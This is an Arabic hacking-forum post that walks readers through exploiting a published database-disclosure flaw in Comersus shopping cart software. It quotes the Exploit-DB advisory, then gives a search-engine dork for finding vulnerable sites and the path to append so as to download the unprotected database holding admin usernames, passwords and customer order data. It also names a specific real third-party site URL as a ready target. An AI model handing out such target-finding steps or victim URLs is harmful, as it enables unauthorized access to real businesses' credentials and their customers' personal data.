:: vBspiders Professional Network :: - مع Dr.NaNo [ تعال حمل الملف تبع الموقع .. وإخترق ..... لوووووووول ]...

السلام عليكم ورحمه الله وبركاته ...

كيفكم ياحلوين اكيد بخير ، << دوم يارب ..

قبل لا ادخل في الموضوع ياريت [ الادارة تفتح قســم خاص بشروحات الثغرات عشان اشرح لكم ] ...

المهم ندخل في صلب الموضوع . ما ابي اطول عليـــكم ..

بسم الله الرحمن الرحيــم ..

اولا هذا موقع الثغره .. للي مايعرف الموقع تبع الثغرات .. :d

www.exploit-db.com

طبعــا موقع >>:

www.MilW0rM.com

^_^ مغلق له 8 شهــور تقريبــأ ....

خلوكم على هذا افضل ..>>:

www.exploit-db.com

نكمل الشرح ..

هذي الثغره الي تخليك تحمل الملف تبع الموقع وفيه معلومات الادمن خخخخخ

http://www.exploit-db.com/exploits/11931

وبشرحهــا لكم ..

الثغره .:

اقتباس:

# Title: Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability
# EDB-ID: 11931
# CVE-ID: ()
# OSVDB-ID: ()
# Author: indoushka
# Published: 2010-03-29
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

view source
print ?

================================================== ======================================
| # Title : Asp - comersus7F Shopping Cart Software Backup Dump Vulnerability
| # Author : indoushka
| # Home : www.iqs3cur1ty.com
| # Bug : Database Disclosure
====================== Exploit By indoushka =================================
# Exploit :

1- http://127.0.0.1/Comersus/database/comersus.mdb

# Brief Description:

By default, comersus.mdb isn't password-protected, and contains the following sensitive information:
- order information (buyer's address, phone, order status, tracking #, obs, etc)
- settings (encryption password, admin email, company information, etc)
- shipments
- etc

Enough to cause damage for the business if any of that information is obtained.

Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
--------------------------------------------------------------------------------------------------------------

اولا .: الدورك ..:

inurl:Asp - comersus7F

واتحداك تحصل الدورك في الثغرة خخخخخخخخخخخخخخخخ

طيب نجي للإستغلال .. مكتوب في الثغره .:

http://127.0.0.1/Comersus/database/comersus.mdb

هذا الاستغلال .. خـطا .. انا اشوف ، انه خـطا ..

وهذا الصحيح ..

http://www.Dr.NaNo.com/comersus7F/database/comersus.mdb

ركزو معي ..:

اكتبو بعد رابط الموقع هذا المسار بس ..:

comersus7F/database/comersus.mdb

وراح يجيك ملف حمله وبتحصل فيه اليوزر والباسورد ههههههههه لوووول

وهذا موقع هدية مني لكم ... :D

كود PHP:

   http://www.totalhealthantiageingclinic.com.au/comersus7F/database/comersus.mdb

################################

الي مافهم ...: < راح افهمــه

رح خذ [ الدورك ] الي فوق ..

وبتطلع لك مواقع بالهبل .. مثل شعر قروشــة .. هههههههههههههههههه

بعدين اختر اي موقع ..:

وامسح الكلام كله. وخل الرابــط كذا

www.xxxx.com

بس واكتب وراه على طول هذا المسار ..:

comersus7F/database/comersus.mdb

وخلاص انتهى ياشنب ...بجيك تحميل حمل وافتحه وبتحصل الباسورد واليورز .. وبس ..:

:D

أنتهى الشششششششششششششششششرح :00001793[1]:

لووووووووووووووول :icon555:

الشــــرح اهـــــداء الى ..:

فريق كلاشنكوف .

والهيكل الارزق .

ودوم البطل .

وسنايبر غزة .

وقروشـة .

ومين كمان ؟ نسيت الباقين والله ..

وإهداء لكل العنــــــــاكـــــب ... < عشان ماحد يزعل ..

تحياتي لكم اخواكم ./

Dr.NaNo